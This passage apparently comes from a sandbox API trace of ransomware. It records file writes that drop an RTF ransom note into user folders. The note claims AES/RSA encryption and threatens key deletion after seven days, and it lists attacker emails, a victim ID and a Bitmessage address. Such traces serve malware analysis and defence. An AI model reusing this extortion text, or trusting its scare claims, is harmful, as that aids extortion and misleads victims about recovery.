m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.797] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.797] CloseHandle (hObject=0x284) returned 1 [0269.798] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0269.798] GetLastError () returned 0x2 [0269.798] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh 